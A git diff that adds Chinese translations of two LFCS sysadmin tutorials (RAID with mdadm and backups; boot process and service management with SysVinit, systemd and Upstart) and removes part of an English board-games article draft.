+
+![Linux Foundation Certified Sysadmin – Part 6](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-6.png)
+
+*LFCS 系列第六讲*
+
+以下视频介绍了 Linux 基金会认证程序。
+
+注:youtube 视频
+
+
+本讲是系列教程中的第六讲,在这一讲里,我们将会解释如何将分区组装为 RAID 设备——创建和管理系统备份。这些都是 LFCS 认证中的必备知识。
+
+### 了解RAID ###
+
+这种被称为独立磁盘冗余阵列(Redundant Array of Independent Disks)(RAID)的技术是将多个硬盘组合成一个单独逻辑单元的存储解决方案,它提供了数据冗余功能并且改善硬盘的读写操作性能。
+
+然而,实际的容错和磁盘 I/O 性能硬盘取决于如何将多个硬盘组装成磁盘阵列。根据可用的设备和容错/性能的需求,RAID 被分为不同的级别,你可以参考 RAID 系列文章以获得每个 RAID 级别更详细的解释。
+
+- [在 Linux 下使用 RAID(一):介绍 RAID 的级别和概念][1]
+
+我们选择用于创建、组装、管理、监视软件 RAID 的工具,叫做 mdadm (multiple disk admin 的简写)。
+
+```
+---------------- Debian 及衍生版 ----------------
+# aptitude update && aptitude install mdadm
+```
+
+```
+---------------- Red Hat 和基于 CentOS 的系统 ----------------
+# yum update && yum install mdadm
+```
+
+```
+---------------- openSUSE 上 ----------------
+# zypper refresh && zypper install mdadm #
+```
+
+#### 将分区组装成 RAID 设备 ####
+
+组装已有分区作为 RAID 设备的过程由以下步骤组成。
+
+**1. 使用 mdadm 创建阵列**
+
+如果先前其中一个分区已经格式化,或者作为了另一个 RAID 阵列的一部分,你会被提示以确认创建一个新的阵列。假设你已经采取了必要的预防措施以避免丢失重要数据,那么可以安全地输入 Y 并且按下回车。
+
+```
+# mdadm --create --verbose /dev/md0 --level=stripe --raid-devices=2 /dev/sdb1 /dev/sdc1
+```
+
+![Creating RAID Array](http://www.tecmint.com/wp-content/uploads/2014/10/Creating-RAID-Array.png)
+
+*创建 RAID 阵列*
+
+**2. 检查阵列的创建状态**
+
+在创建了 RAID 阵列之后,你可以检查使用以下命令检查阵列的状态。
+
+
+ # cat /proc/mdstat
+ or
+ # mdadm --detail /dev/md0 [More detailed summary]
+
+![Check RAID Array Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-RAID-Array-Status.png)
+
+*检查 RAID 阵列的状态*
+
+**3. 格式化 RAID 设备**
+
+如本系列[第四讲][2]所介绍的,按照你的需求/要求采用某种文件系统格式化你的设备。
+
+**4. 监控 RAID 阵列服务**
+
+让监控服务时刻监视你的 RAID 阵列。把`# mdadm --detail --scan`命令输出结果添加到 `/etc/mdadm/mdadm.conf`(Debian及其衍生版)或者`/etc/mdadm.conf`(Cent0S/openSUSE),如下。
+
+ # mdadm --detail --scan
+
+
+![Monitor RAID Array](http://www.tecmint.com/wp-content/uploads/2014/10/Monitor-RAID-Array.png)
+
+*监控 RAID 阵列*
+
+ # mdadm --assemble --scan [Assemble the array]
+
+为了确保服务能够开机启动,需要以 root 权限运行以下命令。
+
+**Debian 及其衍生版**
+
+Debian 及其衍生版能够通过下面步骤使服务默认开机启动:
+
+ # update-rc.d mdadm defaults
+
+在 `/etc/default/mdadm` 文件中添加下面这一行
+
+ AUTOSTART=true
+
+
+**CentOS 和 openSUSE(systemd-based)**
+
+ # systemctl start mdmonitor
+ # systemctl enable mdmonitor
+
+**CentOS 和 openSUSE(SysVinit-based)**
+
+ # service mdmonitor start
+ # chkconfig mdmonitor on
+
+**5. 检查RAID磁盘故障**
+
+在支持冗余的的 RAID 级别中,在需要时会替换故障的驱动器。当磁盘阵列中的设备出现故障时,仅当存在我们第一次创建阵列时预留的备用设备时,磁盘阵列会将自动启动重建。
+
+![Check RAID Faulty Disk](http://www.tecmint.com/wp-content/uploads/2014/10/Check-RAID-Faulty-Disk.png)
+
+*检查 RAID 故障磁盘*
+
+否则,我们需要手动将一个额外的物理驱动器插入到我们的系统,并且运行。
+
+ # mdadm /dev/md0 --add /dev/sdX1
+
+/dev/md0 是出现了问题的阵列,而 /dev/sdx1 是新添加的设备。
+
+**6. 拆解一个工作阵列**
+
+如果你需要使用工作阵列的设备创建一个新的阵列,你可能不得不去拆解已有工作阵列——(可选步骤)
+
+ # mdadm --stop /dev/md0 # Stop the array
+ # mdadm --remove /dev/md0 # Remove the RAID device
+ # mdadm --zero-superblock /dev/sdX1 # Overwrite the existing md superblock with zeroes
+
+**7. 设置邮件通知**
+
+你可以配置一个用于发送通知的有效邮件地址或者系统账号(确保在 mdadm.conf 文件中有下面这一行)。——(可选步骤)
+
+ MAILADDR root
+
+在这种情况下,来自 RAID 后台监控程序所有的通知将会发送到你的本地 root 账号的邮件箱中。其中一个类似的通知如下。
+
+说明:此次通知事件和第5步中的例子相关。此处一个设备被标志为错误,并且一个空闲的设备自动地被 mdadm 加入到阵列。我们用完了所有“健康的”空闲设备,因此我们得到了通知。
+
+![RAID Monitoring Alerts](http://www.tecmint.com/wp-content/uploads/2014/10/RAID-Monitoring-Alerts.png)
+
+*RAID 监控通知*
+
+#### 了解 RAID 级别 ####
+
+**RAID 0**
+
+阵列总大小是最小分区大小的 n 倍,n 是阵列中独立磁盘的个数(你至少需要两个驱动器/磁盘)。运行下面命令,使用 /dev/sdb1 和 /dev/sdc1 分区组装一个 RAID 0 阵列。
+
+ # mdadm --create --verbose /dev/md0 --level=stripe --raid-devices=2 /dev/sdb1 /dev/sdc1
+
+常见用途:用于支持性能比容错更重要的实时应用程序的设置
+
+**RAID 1 (又名镜像)**
+
+阵列总大小等于最小分区大小(你至少需要两个驱动器/磁盘)。运行下面命令,使用 /dev/sdb1 和 /dev/sdc1 分区组装一个 RAID 1 阵列。
+
+ # mdadm --create --verbose /dev/md0 --level=1 --raid-devices=2 /dev/sdb1 /dev/sdc1
+
+常见用途:操作系统的安装或者重要的子文件夹,例如 /home
+
+**RAID 5 (又名奇偶校验码盘)**
+
+阵列总大小将是最小分区大小的 (n-1) 倍。所减少的大小用于奇偶校验(冗余)计算(你至少需要3个驱动器/磁盘)。
+
+说明:你可以指定一个空闲设备 (/dev/sde1) 替换问题出现时的故障部分(分区)。运行下面命令,使用 /dev/sdb1, /dev/sdc1, /dev/sdd1,/dev/sde1 组装一个 RAID 5 阵列,其中 /dev/sde1 作为空闲分区。
+
+ # mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1 --spare-devices=1 /dev/sde1
+
+常见用途:Web 和文件服务
+
+**RAID 6 (又名双重奇偶校验码盘)**
+
+阵列总大小为(n*s)-2*s,其中n为阵列中独立磁盘的个数,s为最小磁盘大小。
+
+说明:你可以指定一个空闲分区(在这个例子为 /dev/sdf1)替换问题出现时的故障部分(分区)。
+
+运行下面命令,使用 /dev/sdb1, /dev/sdc1, /dev/sdd1, /dev/sde1 和 /dev/sdf1 组装 RAID 6 阵列,其中 /dev/sdf1 作为空闲分区。
+
+ # mdadm --create --verbose /dev/md0 --level=6 --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde --spare-devices=1 /dev/sdf1
+
+常见用途:大容量、高可用性要求的文件服务器和备份服务器。
+
+**RAID 1+0 (又名镜像条带)**
+
+因为 RAID 1+0 是 RAID 0 和 RAID 1 的组合,所以阵列总大小是基于两者的公式计算的。首先,计算每一个镜像的大小,然后再计算条带的大小。
+
+ # mdadm --create --verbose /dev/md0 --level=10 --raid-devices=4 /dev/sd[b-e]1 --spare-devices=1 /dev/sdf1
+
+常见用途:需要快速 IO 操作的数据库和应用服务器
+
+#### 创建和管理系统备份 ####
+
+记住, RAID 其所有的价值不是在于备份的替换者!在黑板上写上1000次,如果你需要的话,但无论何时一定要记住它。在我们开始前,我们必须注意的是,没有一个放之四海皆准的针对所有系统备份的解决方案,但这里有一些东西,是你在规划一个备份策略时需要考虑的。
+
+- 你的系统将用于什么?(桌面或者服务器?如果系统是应用于后者,那么最重要的服务是什么?哪个配置是痛点?)
+- 你每隔多久备份你的系统?
+- 你需要备份的数据是什么(比如文件/文件夹/数据库转储)?你还可以考虑是否需要备份大型文件(比如音频和视频文件)。
+- 这些备份将会存储在哪里(物理位置和媒体)?
+
+**备份你的数据**
+
+方法1:使用 dd 命令备份整个磁盘。你可以在任意时间点通过创建一个准确的镜像来备份一整个硬盘或者是分区。注意当设备是离线时,这种方法效果最好,也就是说它没有被挂载并且没有任何进程的 I/O 操作访问它。
+
+这种备份方法的缺点是镜像将具有和磁盘或分区一样的大小,即使实际数据占用的是一个很小的比例。比如,如果你想要为只使用了10%的20GB的分区创建镜像,那么镜像文件将仍旧是20GB。换句话来讲,它不仅包含了备份的实际数据,而且也包含了整个分区。如果你想完整备份你的设备,那么你可以考虑使用这个方法。
+
+**从现有的设备创建一个镜像文件**
+
+ # dd if=/dev/sda of=/system_images/sda.img
+ 或者
+ --------------------- 可选地,你可以压缩镜像文件 -------------------
+ # dd if=/dev/sda | gzip -c > /system_images/sda.img.gz
+
+**从镜像文件恢复备份**
+
+ # dd if=/system_images/sda.img of=/dev/sda
+ 或者
+ --------------------- 根据你创建镜像文件时的选择(译者注:比如压缩) ----------------
+ # gzip -dc /system_images/sda.img.gz | dd of=/dev/sda
+
+方法2:使用 tar 命令备份确定的文件/文件夹——已经在本系列[第三讲][3]中讲了。如果你想要备份指定的文件/文件夹(配置文件,用户主目录等等),你可以使用这种方法。
+
+方法3:使用 rsync 命令同步文件。rsync 是一种多功能远程(和本地)文件复制工具。如果你想要从网络设备备份或同步文件,rsync 是一种选择。
+
+
+无论是你是正在同步两个本地文件夹还是本地 < — > 挂载在本地文件系统的远程文件夹,其基本语法是一样的。
+
+ # rsync -av source_directory destination_directory
+
+在这里,-a 递归遍历子目录(如果它们存在的话),维持符号链接、时间戳、权限以及原本的属主/属组,-v 显示详细过程。
+
+![rsync Synchronizing Files](http://www.tecmint.com/wp-content/uploads/2014/10/rsync-synchronizing-Files.png)
+
+*rsync 同步文件*
+
+除此之外,如果你想增加在网络上传输数据的安全性,你可以通过 ssh 协议使用 rsync。
+
+**通过 ssh 同步本地到远程文件夹**
+
+ # rsync -avzhe ssh backups root@remote_host:/remote_directory/
+
+这个示例,本地主机上的 backups 文件夹将与远程主机上的 /root/remote_directory 的内容同步。
+
+在这里,-h 选项以易读的格式显示文件的大小,-e 标志用于表示一个 ssh 连接。
+
+![rsync Synchronize Remote Files](http://www.tecmint.com/wp-content/uploads/2014/10/rsync-synchronize-Remote-Files.png)
+
+*rsync 同步远程文件*
+
+**通过ssh同步远程到本地文件夹**
+
+在这种情况下,交换前面示例中的 source 和 destination 文件夹。
+
+ # rsync -avzhe ssh root@remote_host:/remote_directory/ backups
+
+请注意这些只是 rsync 用法的三个示例而已(你可能遇到的最常见的情形)。对于更多有关 rsync 命令的示例和用法 ,你可以查看下面的文章。
+
+- [在 Linux 下同步文件的10个 rsync命令][4]
+
+### 总结 ###
+
+作为一个系统管理员,你需要确保你的系统表现得尽可能好。如果你做好了充分准备,并且如果你的数据完整性能被诸如 RAID 和系统日常备份的存储技术支持,那你将是安全的。
+
+如果你有有关完善这篇文章的问题、评论或者进一步的想法,可以在下面畅所欲言。除此之外,请考虑通过你的社交网络简介分享这系列文章。
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/creating-and-managing-raid-backups-in-linux/
+
+作者:[Gabriel Cánepa][a]
+译者:[cpsoture](https://github.com/cposture)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.tecmint.com/author/gacanepa/
+[1]:https://linux.cn/article-6085-1.html
+[2]:https://linux.cn/article-7187-1.html
+[3]:https://linux.cn/article-7171-1.html
+[4]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/
+
diff --git a/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md b/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
new file mode 100644
index 0000000000..ff987c3e9b
--- /dev/null
+++ b/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
@@ -0,0 +1,341 @@
+LFCS 系列第七讲:通过 SysVinit、Systemd 和 Upstart 管理系统自启动进程和服务
+================================================================================
+几个月前, Linux 基金会宣布 LFCS (Linux 基金会认证系统管理员) 认证诞生了,这个令人兴奋的新计划定位于让来自全球各地的初级到中级的 Linux 系统管理员得到认证。这其中包括维护已经在运行的系统和服务的能力、第一手的问题查找和分析能力、以及决定何时向开发团队提交问题的能力。
+
+![Linux Foundation Certified Sysadmin – Part 7](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-7.png)
+
+*第七讲: Linux 基金会认证系统管理员*
+
+下面的视频简要介绍了 Linux 基金会认证计划。
+
+注:youtube 视频
+
+
+本讲是系列教程中的第七讲,在这篇文章中,我们会介绍如何管理 Linux 系统自启动进程和服务,这是 LFCS 认证考试要求的一部分。
+
+### 管理 Linux 自启动进程 ###
+
+Linux 系统的启动程序包括多个阶段,每个阶段由一个不同的图示块表示。下面的图示简要总结了启动过程以及所有包括的主要组件。
+
+![Linux Boot Process](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-Boot-Process.png)
+
+*Linux 启动过程*
+
+当你按下你机器上的电源键时,存储在主板 EEPROM 芯片中的固件初始化 POST(通电自检) 检查系统硬件资源的状态。POST 结束后,固件会搜索并加载位于第一块可用磁盘上的 MBR 或 EFI 分区的第一阶段引导程序,并把控制权交给引导程序。
+
+#### MBR 方式 ####
+
+MBR 是位于 BIOS 设置中标记为可启动磁盘上的第一个扇区,大小是 512 个字节。
+
+- 前面 446 个字节:包括可执行代码和错误信息文本的引导程序
+- 接下来的 64 个字节:四个分区(主分区或扩展分区)中每个分区一条记录的分区表。其中,每条记录标示了每个一个分区的状态(是否活跃)、大小以及开始和结束扇区。
+- 最后 2 个字节: MBR 有效性检查的魔法数。
+
+下面的命令对 MBR 进行备份(在本例中,/dev/sda 是第一块硬盘)。结果文件 mbr.bkp 在分区表被破坏、例如系统不可引导时能排上用场。
+
+当然,为了后面需要的时候能使用它,我们需要把它保存到别的地方(例如一个 USB 设备)。该文件能帮助我们重新恢复 MBR,这只在我们操作过程中没有改变硬盘驱动布局时才有效。
+
+**备份 MBR**
+
+ # dd if=/dev/sda of=mbr.bkp bs=512 count=1
+
+![Backup MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Backup-MBR-in-Linux.png)
+
+*在 Linux 中备份 MBR*
+
+**恢复 MBR**
+
+ # dd if=mbr.bkp of=/dev/sda bs=512 count=1
+
+![Restore MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-MBR-in-Linux.png)
+
+*在 Linux 中恢复 MBR*
+
+#### EFI/UEFI 方式 ####
+
+对于使用 EFI/UEFI 方式的系统, UEFI 固件读取它的设置来决定从哪里启动哪个 UEFI 应用。(例如, EFI 分区位于哪块磁盘或分区。
+
+接下来,加载并运行第二阶段引导程序(又名引导管理器)。GRUB[GRand Unified Boot] 是 Linux 中最常使用的引导管理器。今天大部分使用的系统中都能找到它两个中的其中一个版本。
+
+- GRUB 有效配置文件: /boot/grub/menu.lst(旧发行版, EFI/UEFI 固件不支持)。
+- GRUB2 配置文件: 通常是 /etc/default/grub。
+
+尽管 LFCS 考试目标没有明确要求了解 GRUB 内部知识,但如果你足够大胆并且不怕把你的系统搞乱(为了以防万一,你可以先在虚拟机上进行尝试)你可以运行:
+
+ # update-grub
+
+为了使更改生效,你需要以 root 用户修改 GRUB 的配置。
+
+首先, GRUB 加载默认的内核以及 initrd 或 initramfs 镜像。补充一句,initrd 或者 initramfs 帮助完成硬件检测、内核模块加载、以及发现挂载根目录文件系统需要的设备。
+
+一旦真正的根目录文件系统启动,为了显示用户界面,内核就会执行系统和服务管理器(init 或 systemd,进程号 PID 一般为 1)开始普通用户态的引导程序。
+
+init 和 systemd 都是管理其它守护进程的守护进程(后台进程),它们总是最先启动(系统引导时),最后结束(系统关闭时)。
+
+![Systemd and Init](http://www.tecmint.com/wp-content/uploads/2014/10/systemd-and-init.png)
+
+*Systemd 和 Init*
+
+### 自启动服务(SysVinit) ###
+
+Linux 中运行等级通过控制运行哪些服务来以不同方式使用系统。换句话说,运行等级控制着当前执行状态下可以完成什么任务(以及什么不能完成)。
+
+传统上,这个启动过程是基于起源于 System V Unix 的形式,通过执行脚本启动或者停止服务从而使机器进入指定的运行等级(换句话说,是一个不同的系统运行模式)。
+
+在每个运行等级中,独立服务可以设置为运行、或者在运行时关闭。一些主流发行版的最新版本中,已经移除了标准的 System V,而用一个称为 systemd(表示系统守护进程)的新服务和系统管理器代替,但为了兼容性,通常也支持 sysv 命令。这意味着你可以在基于 systemd 的发行版中运行大部分有名的 sysv 初始化工具。
+
+- 推荐阅读: [Linux 为什么用 ‘systemd’ 代替 ‘init’][1]
+
+除了启动系统进程,init 还会查看 /etc/inittab 来决定进入哪个运行等级。
+
+
+|Runlevel| Description|
+|--------|------------|
+|0|停止系统。运行等级 0 是一个用于快速关闭系统的特殊过渡状态。|
+|1|别名为 s 或 S,这个运行等级有时候也称为维护模式。在这个运行等级启动的服务由于发行版不同而不同。通常用于正常系统操作损坏时低级别的系统维护。|
+|2|多用户。在 Debian 系统及其衍生版中,这是默认的运行等级,还包括了一个图形化登录(如果有的话)。在基于红帽的系统中,这是没有网络的多用户模式。|
+|3|在基于红帽的系统中,这是默认的多用户模式,运行除了图形化环境以外的所有东西。基于 Debian 的系统中通常不会使用这个运行等级以及等级 4 和 5。|
+|4|通常默认情况下不使用,可用于自定制。|
+|5|基于红帽的系统中,支持 GUI 登录的完全多用户模式。这个运行等级和等级 3 类似,但是有可用的 GUI 登录。|
+|6|重启系统。|
+
+
+要在运行等级之间切换,我们只需要使用 init 命令更改运行等级:init N(其中 N 是上面列出的一个运行等级)。
+请注意这并不是运行中的系统切换运行等级的推荐方式,因为它不会给已经登录的用户发送警告(因而导致他们丢失工作以及进程异常终结)。
+
+相反,应该用 shutdown 命令重启系统(它首先发送警告信息给所有已经登录的用户,并锁住任何新的登录;然后再给 init 发送信号切换运行等级)但是,首先要在 /etc/inittab 文件中设置好默认的运行等级(系统引导到的等级)。
+
+因为这个原因,按照下面的步骤切当地切换运行等级。以 root 用户在 /etc/inittab 中查找下面的行。
+
+ id:2:initdefault:
+
+并用你喜欢的文本编辑器,例如 vim(本系列的 [LFCS 系列第二讲:如何安装和使用纯文本编辑器 vi/vim][2]),更改数字 2 为想要的运行等级。
+
+然后,以 root 用户执行
+
+ # shutdown -r now
+
+最后一个命令会重启系统,并使它在下一次引导时进入指定的运行等级,并会执行保存在 /etc/rc[runlevel].d 目录中的脚本以决定应该启动什么服务、不应该启动什么服务。例如,在下面的系统中运行等级 2。
+
+![Change Runlevels in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Runlevels-in-Linux.jpeg)
+
+*在 Linux 中更改运行等级*
+
+#### 使用 chkconfig 管理服务 ####
+
+为了在启动时启动或者停用系统服务,我们可以在 CentOS / openSUSE 中使用 [chkconfig 命令][3],在 Debian 及其衍生版中使用 sysv-rc-conf 命令。这个工具还能告诉我们对于一个指定的运行等级预先配置的状态是什么。
+
+- 推荐阅读: [如何在 Linux 中停止和停用不想要的服务][4]
+
+列出某个服务的运行等级配置。
+
+ # chkconfig --list [service name]
+ # chkconfig --list postfix
+ # chkconfig --list mysqld
+
+![Listing Runlevel Configuration](http://www.tecmint.com/wp-content/uploads/2014/10/Listing-Runlevel-Configuration.png)
+
+*列出运行等级配置*
+
+从上图中我们可以看出,当系统进入运行等级 2 到 5 的时候就会启动 postfix,而默认情况下运行等级 2 到 4 时会运行 mysqld。现在假设我们并不希望如此。
+
+例如,我们希望运行等级为 5 时也启动 mysqld,运行等级为 4 或 5 时关闭 postfix。下面分别针对两种情况进行设置(以 root 用户执行以下命令)。
+
+**为特定运行等级启用服务**
+
+ # chkconfig --level [level(s)] service on
+ # chkconfig --level 5 mysqld on
+
+**为特定运行等级停用服务**
+
+ # chkconfig --level [level(s)] service off
+ # chkconfig --level 45 postfix off
+
+![在 Linux 中启用/停用服务Enable Disable Services in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Disable-Services.png)
+
+*启用/停用服务*
+
+我们在基于 Debian 的系统中使用 sysv-rc-conf 完成类似任务。
+
+#### 使用 sysv-rc-conf 管理服务 ####
+
+配置服务自动启动时进入指定运行等级,同时禁止启动时进入其它运行等级。
+
+1. 我们可以用下面的命令查看启动 mdadm 时的运行等级。
+
+ # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
+
+
+ ![查看运行中服务的运行等级Check Runlevel of Service Running](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Runlevel.png)
+
+ *查看运行中服务的运行等级*
+
+2. 我们使用 sysv-rc-conf 设置防止 mdadm 在运行等级2 之外的其它等级启动。只需根据需要(你可以使用上下左右按键)选中或取消选中(通过空格键)。
+
+ # sysv-rc-conf
+
+ ![Sysv 运行等级配置SysV Runlevel Config](http://www.tecmint.com/wp-content/uploads/2014/10/SysV-Runlevel-Config.png)
+
+ *Sysv 运行等级配置*
+
+ 然后输入 q 退出。
+
+3. 重启系统并从步骤 1 开始再操作一遍。
+
+ # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
+
+ ![验证服务运行等级Verify Service Runlevel](http://www.tecmint.com/wp-content/uploads/2014/10/Verify-Service-Runlevel.png)
+
+ *验证服务运行等级*
+
+ 从上图中我们可以看出 mdadm 配置为只在运行等级 2 上启动。
+
+### 那关于 systemd 呢? ###
+
+systemd 是另外一个被多种主流 Linux 发行版采用的服务和系统管理器。它的目标是允许系统启动时多个任务尽可能并行(而 sysvinit 并非如此,sysvinit 一般比较慢,因为它每次只启动一个进程,而且会检查彼此之间是否有依赖,在启动其它服务之前还要等待守护进程启动),充当运行中系统动态资源管理的角色。
+
+因此,服务只在需要的时候启动,而不是系统启动时毫无缘由地启动(为了防止消耗系统资源)。
+
+要查看你系统中运行的原生 systemd 服务和 Sysv 服务,可以用以下的命令。
+
+ # systemctl
+
+![在 Linux 中查看运行中的进程Check All Running Processes in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-All-Running-Processes.png)
+
+*查看运行中的进程*
+
+LOAD 一列显示了单元(UNIT 列,显示服务或者由 systemd 维护的其它进程)是否正确加载,ACTIVE 和 SUB 列则显示了该单元当前的状态。
+
+**显示服务当前状态的信息**
+
+当 ACTIVE 列显示某个单元状态并非活跃时,我们可以使用以下命令查看具体原因。
+
+ # systemctl status [unit]
+
+例如,上图中 media-samba.mount 处于失败状态。我们可以运行:
+
+ # systemctl status media-samba.mount
+
+![查看 Linux 服务状态Check Linux Service Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Status.png)
+
+*查看服务状态*
+
+我们可以看到 media-samba.mount 失败的原因是 host dev1 上的挂载进程无法找到 //192.168.0.10/gacanepa 上的共享网络。
+
+### 启动或停止服务 ###
+
+一旦 //192.168.0.10/gacanepa 上的共享网络可用,我们可以再来尝试启动、停止以及重启 media-samba.mount 单元。执行每次操作之后,我们都执行 systemctl stats media-samba.mout 来查看它的状态。
+
+ # systemctl start media-samba.mount
+ # systemctl status media-samba.mount
+ # systemctl stop media-samba.mount
+ # systemctl restart media-samba.mount
+ # systemctl status media-samba.mount
+
+![启动停止服务](http://www.tecmint.com/wp-content/uploads/2014/10/Starting-Stoping-Service.jpeg)
+
+*启动停止服务*
+
+**启用或停用某服务随系统启动**
+
+使用 systemd 你可以在系统启动时启用或停用某服务
+
+ # systemctl enable [service] # 启用服务
+ # systemctl disable [service] # 阻止服务随系统启动
+
+
+启用或停用某服务随系统启动包括在 /etc/systemd/system/multi-user.target.wants 目录添加或者删除符号链接。
+
+![启用或停用服务](http://www.tecmint.com/wp-content/uploads/2014/10/Enabling-Disabling-Services.jpeg)
+
+*启用或停用服务*
+
+你也可以用下面的命令查看某个服务的当前状态(启用或者停用)。
+
+ # systemctl is-enabled [service]
+
+例如,
+
+ # systemctl is-enabled postfix.service
+
+另外,你可以用下面的命令重启或者关闭系统。
+
+ # systemctl reboot
+ # systemctl shutdown
+
+### Upstart ###
+
+基于事件的 Upstart 是 /sbin/init 守护进程的替代品,它仅为在需要那些服务的时候启动服务而生,(或者当它们在运行时管理它们),以及处理发生的实践,因此 Upstart 优于基于依赖的 sysvinit 系统。
+
+一开始它是为 Ubuntu 发行版开发的,但在红帽企业版 Linux 6.0 中得到使用。尽管希望它能在所有 Linux 发行版中替代 sysvinit,但它已经被 systemd 超越。2014 年 2 月 14 日,Mark Shuttleworth(Canonical Ltd. 创建者)发布声明之后的 Ubuntu 发行版采用 systemd 作为默认初始化守护进程。
+
+由于 Sysv 启动脚本已经流行很长时间了,很多软件包中都包括了 Sysv 启动脚本。为了兼容这些软件, Upstart 提供了兼容模式:它可以运行保存在常用位置(/etc/rc.d/rc?.d, /etc/init.d/rc?.d, /etc/rc?.d或其它类似的位置)的Sysv 启动脚本。因此,如果我们安装了一个还没有 Upstart 配置脚本的软件,仍然可以用原来的方式启动它。
+
+另外,如果我们还安装了类似 [chkconfig][5] 的工具,你还可以和在基于 sysvinit 的系统中一样用它们管理基于 Sysv 的服务。
+
+Upstart 脚本除了支持 Sysv 启动脚本,还支持基于多种方式启动或者停用服务;例如, Upstart 可以在一个特定硬件设备连接上的时候启动一个服务。
+
+使用 Upstart以及它原生脚本的系统替换了 /etc/inittab 文件和 /etc/init 目录下和运行等级相关的以 .conf 作为后缀的 Sysv 启动脚本目录。
+
+这些 *.conf 脚本(也称为任务定义)通常包括以下几部分:
+
+- 进程描述
+- 进程的运行等级或者应该触发它们的事件
+- 应该停止进程的运行等级或者触发停止进程的事件
+- 选项
+- 启动进程的命令
+
+例如,
+
+ # My test service - Upstart script demo description "Here goes the description of 'My test service'" author "Dave Null "
+ # Stanzas
+
+ #
+ # Stanzas define when and how a process is started and stopped
+ # See a list of stanzas here: http://upstart.ubuntu.com/wiki/Stanzas#respawn
+ # When to start the service
+ start on runlevel [2345]
+ # When to stop the service
+ stop on runlevel [016]
+ # Automatically restart process in case of crash
+ respawn
+ # Specify working directory
+ chdir /home/dave/myfiles
+ # Specify the process/command (add arguments if needed) to run
+ exec bash backup.sh arg1 arg2
+
+要使更改生效,你要让 upstart 重新加载它的配置文件。
+
+ # initctl reload-configuration
+
+然后用下面的命令启动你的任务。
+
+ $ sudo start yourjobname
+
+其中 yourjobname 是之前 yourjobname.conf 脚本中添加的任务名称。
+
+关于 Upstart 更完整和详细的介绍可以参考该项目网站的 “[Cookbook][6]” 栏目。
+
+### 总结 ###
+
+了解 Linux 启动进程对于你进行错误处理、调整计算机系统以及根据需要运行服务非常有用。
+
+在这篇文章中,我们分析了你按下电源键启动机器的一刻到你看到完整的可操作用户界面这段时间发生了什么。我希望你能像我一样把它们放在一起阅读。欢迎在下面留下你的评论或者疑问。我们总是期待听到读者的回复。
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/linux-boot-process-and-manage-services/
+
+作者:[Gabriel Cánepa][a]
+译者:[ictlyh](http://mutouxiaogui.cn/blog/)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.tecmint.com/author/gacanepa/
+[1]:http://www.tecmint.com/systemd-replaces-init-in-linux/
+[2]:https://linux.cn/article-7165-1.html
+[3]:http://www.tecmint.com/chkconfig-command-examples/
+[4]:http://www.tecmint.com/remove-unwanted-services-from-linux/
+[5]:http://www.tecmint.com/chkconfig-command-examples/
+[6]:http://upstart.ubuntu.com/cookbook/
diff --git a/sources/share/20150901 5 best open source board games to play online.md b/sources/share/20150901 5 best open source board games to play online.md
deleted file mode 100644
index eee49289e0..0000000000
--- a/sources/share/20150901 5 best open source board games to play online.md
+++ /dev/null
@@ -1,195 +0,0 @@
-translating by tastynoodle
-5 best open source board games to play online
-================================================================================
-I have always had a fascination with board games, in part because they are a device of social interaction, they challenge the mind and, most importantly, they are great fun to play. In my misspent youth, myself and a group of friends gathered together to escape the horrors of the classroom, and indulge in a little escapism. The time provided an outlet for tension and rivalry. Board games help teach diplomacy, how to make and break alliances, bring families and friends together, and learn valuable lessons.
-
-I had a panache for abstract strategy games such as chess and draughts, as well as word games. I can still never resist a game of Escape from Colditz, a strategy card and dice-based board game, or Risk; two timeless multi-player strategy board games. But Catan remains my favourite board game.
-
-Board games have seen a resurgence in recent years, and Linux has a good range of board games to choose from. There is a credible implementation of Catan called Pioneers. But for my favourite implementations of classic board games to play online, check out the recommendations below.
-
-----------
-
-### TripleA ###
-
-![TripleA in action](http://www.linuxlinks.com/portal/content/reviews/Games2/Screenshot-TripleA.png)
-
-TripleA is an open source online turn based strategy game. It allows people to implement and play various strategy board games (ie. Axis & Allies). The TripleA engine has full networking support for online play, support for sounds, XML support for game files, and has its own imaging subsystem that allows for customized user editable maps to be used. TripleA is versatile, scalable and robust.
-
-TripleA started out as a World War II simulation, but now includes different conflicts, as well as variations and mods of popular games and maps. TripleA comes with multiple games and over 100 more games can be downloaded from the user community.
-
-Features include:
-
-- Good interface and attractive graphics
-- Optional scenarios
-- Multiplayer games
-- TripleA comes with the following supported games that uses its game engine (just to name a few):
- - Axis & Allies : Classic edition (2nd, 3rd with options enabled)
- - Axis & Allies : Revised Edition
- - Pact of Steel A&A Variant
- - Big World 1942 A&A Variant
- - Four if by Sea
- - Battle Ship Row
- - Capture The Flag
- - Minimap
-- Hot-seat
-- Play By EMail mode allows persons to play a game via EMail without having to be connected to each other online
- - More time to think out moves
- - Only need to come online to send your turn to the next player
